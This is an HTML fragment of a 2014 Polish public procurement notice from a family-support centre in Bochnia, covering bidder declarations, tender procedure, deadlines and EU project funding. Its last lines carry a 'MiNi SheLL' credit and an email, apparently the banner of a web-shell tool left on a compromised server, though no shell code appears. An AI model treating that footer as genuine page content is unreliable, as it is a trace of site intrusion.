Oświadczenie Wykonawcy, że zapoznał się z zakresem zamówienia oraz uzyskał wszelkie niezbędne informacje w celu przygotowania i złożenia oferty z należytą starannością.
Oświadczenie Wykonawcy o dysponowaniu miejscem położonym w odległości nie mniejszej niż 70 km i nie większej niż 150 km od miasta Bochnia, przy czym obiekt musi spełniać wymogi określone w opisie przedmiotu zamówienia
Oświadczenie Wykonawcy o dysponowaniu autokarem do przewozu maksymalnie 52 osób</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.malopolska.pl/pcprwbochni/Article/id,254976.html<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowe Centrum Pomocy Rodzinie w Bochni
ul. Windakiewicza 9/5
32-700 Bochnia.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.08.2014 godzina 11:00, miejsce: Powiatowe Centrum Pomocy Rodzinie w Bochni
ul. Windakiewicza 9/5
32-700 Bochnia.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt pn Wzmacnianie integracji społecznej w Powiecie Bocheńskim.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com